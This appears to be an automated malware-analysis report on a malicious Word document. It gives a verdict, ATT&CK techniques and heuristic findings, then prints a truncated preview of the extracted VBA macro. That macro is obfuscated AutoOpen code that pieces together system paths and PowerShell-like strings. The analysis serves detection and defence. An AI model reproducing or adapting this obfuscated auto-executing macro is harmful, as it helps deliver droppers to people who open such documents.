Verdict: MALICIOUS (Risk Score: 170)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is an Office document containing a VBA macro with an AutoOpen subroutine. The macro uses a CreateObject call, a common technique for executing malicious code or downloading additional payloads. The obfuscation of the script prevents a more detailed analysis of its specific actions, but the combination of AutoOpen and CreateObject strongly suggests downloader or dropper functionality.
Heuristics (7)

- VBA macros detected (medium; 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]: Environ() call (env variable access).
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 187257 bytes |

SHA-256: 79a44341aa5e3d7c0acf511695ba9f32d67d60e44e7205bfabd9573c5ceb2ce9

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function ufvrkvv(ovii)
ntuhzhydqhfz = -41 * 31
End Function
Function clwiu79()
nzeugie = -40 / 10
uiyarnu = -72 * 156
nxsao = -152 / 121
End Function
Function eyuypm(gpgwtixs)
pzulwuxxvj = -107 * 17
azaamteue = -174 / 2
eoide = -149 * 93
qdeiei = -37 * 86
End Function
Function cpxbm(flsfdoa30, vsdu03)
untyyddey = -37 + 155
End Function
Function agyeo(ndhy, yoyfk, vxayo)
eaiec = -71 - 122
zwyzkwcthbhw = -22 - 158
End Function
Function fraqflvn()
uuuvxua1 = -13 / 136
End Function
Function yvikpcha0()
pyegbqu = -81 + 63
End Function
Function wzyxfdao(xmaauy, eoddopu)
ozontijpl = -92 / 92
ukaoiyo = -72 - 180
End Function
Function ykwra6(aikcjshxg, avfak8, ksltrsb08)
gueufcu = -26 / 100
End Function
Function odbol()
oureekw39 = -55 / 87
End Function
Function vvqorlk(oulkl, tqixca)
ejbsya = -131 + 175
tjifgk2 = -130 / 34
uikpgesfyy = -42 - 161
End Function
Function zfogzsnq(gljdugxt, nflau, ekged9)
oeywmnyu = -106 * 129
xkakzig = -118 + 128
End Function
Sub AutoOpen()
teyusr = -92 / 179
aigaao = -120 / 145
jlvxpoe = "$nhaagkq"
uauui04 = -7 - 46
mauimx = -34 - 121
ohtbca = "te"
xqsevva1 = "mp"
xiouyyvb = -91 - 141
iwzlfww = -174 * 146
akuu = -101 - 98
iuzwmhmg = ohtbca & xqsevva1
upfeivkye = -71 - 143
pvfjwk = "ohchqpef"
kiirbvsbqsv = -43 * 79
loya = -82 * 164
pyiacce = "gheaicx+$iqaowaoen"
xqeoeo = -56 - 7
qcaye = -169 + 166
howlvkln0 = "zywqiabtlhlpi+"
ekpoo = -171 * 38
Dim rhfjreuhd As String
rhfjreuhd = -152 + 128
kflehpcepgc = -111 * 112
feuye = "$gevaiiaog"
nbaiy1 = -127 * 172
mscxsy = -117 * 15
wuqwyb = -43 / 176
xpjrcgg32 = "guuienz+$sfu"
cukrawvv = -80 - 109
xzaou = "stisbugxy"
fxfnmreo10 = Environ("SystemRoot")
ygneouodho00 = -178 / 157
nbbgkhlzx = -173 - 147
yoauey = -55 / 92
eoenvxu44 = -59 - 92
dlatlrefvapl = -124 / 38
ebzuxkl = "xboahzyrhim"
iaudvbldpt51 = -18 - 160
cfpfamx = "ya+$audg"
eiackncjvd = -50 / 148
eeaodmeb = -80 * 144
qqabshq = jlvxpoe & pvfjwk & pyiacce & howlvkln0 & feuye & xpjrcgg32 & xzaou & ebzuxkl & cfpfamx
auipw8 = -96 * 52
zjzcvxgru = -171 * 177
whufbqvpv = -100 / 113
mqwli47 = -87 * 68
tdbvooe = -14 + 38
Dim giogqv, uyddyazkqo, hwyagxx, kkiso1 As Integer
giogqv = -146 - 50
qkndjdil = -62 / 62
azzketi = "t';$eqkdsgfwuau"
ukdahpsd1 = -90 / 39
yyilbfshzj = -76 - 99
ocnpsddtee = -64 + 156
eemtjo = fxfnmreo10
auyya = -132 + 31
kuoa = -124 * 2
eemtjo = eemtjo + "\sys"
bscroxuvvb = -9 - 138
iaykhya = -17 / 33
Dim kaobwv As Integer
kaobwv = -151 - 100
neee = "subwhfw=' ''\gv"
uiosjri = -165 * 75
fdutjctl = -47 + 178
gjtakb = "fs';$omiyoaqrtauqjwhmooitlu='v"
puoaka = -153 / 155
ukvyeyy = -14 + 171
aijnoaopgcb = -142 - 172
dlxhaio = ":tem';$ggpsidleyetsojuyizjzku="
rzqiu = -178 + 139
ooyrwpbo = -106 + 34
oapz = -147 * 151
gmiitcta = eemtjo
mwjiu8 = -170 + 1
ruufqk = -108 * 118
wlzlxcg = "tem32\"
omdtzqumxey = -148 / 58
yykplckcgvj = -120 * 46
gmiitcta = gmiitcta + wlzlxcg
kwybmiktc = -18 + 77
ongoxayc = -129 - 92
dqoyoo00 = -168 * 23
fmsyhmse = -83 + 14
eibrbxkvp = -83 - 155
ulzfmofj = "'book"
juadyoli09 = -138 / 113
gksci = "skee';$iqaowaoe"
jndnzoau = -117 + 35
Dim aaoyae As Integer
aaoyae = -38 + 111
aoeetd = "nzywqiabtlhl"
uphnze31 = -117 / 105
uevunx12 = azzketi & neee & gjtakb & dlxhaio & ulzfmofj & gksci & aoeetd
Dim hajvvq64 As Integer
hajvvq64 = -16 / 172
amfoevtvgtq = -91 + 163
xhenjslqmdva70 = -39 / 91
crjof = "Windo"
hhpyy = -22 - 143
rplkhrxfhap = -32 + 29
iyyoueaj = -154 - 86
gmiitcta = gmiitcta + crjof
oyliipnrx = -104 * 16
uuxraueapr = -138 + 105
mlgiagzngtp = -98 - 8
oylo = -57 * 134
uuwbbvoko = -7 + 3
ubkuyp = -127 / 81
stmcyae37 = -163 * 36
ugyrn = "hqlitooo"
Dim jbuutu As String
jbuutu = -174 + 97
eomkqoa = -7 + 1
... (truncated)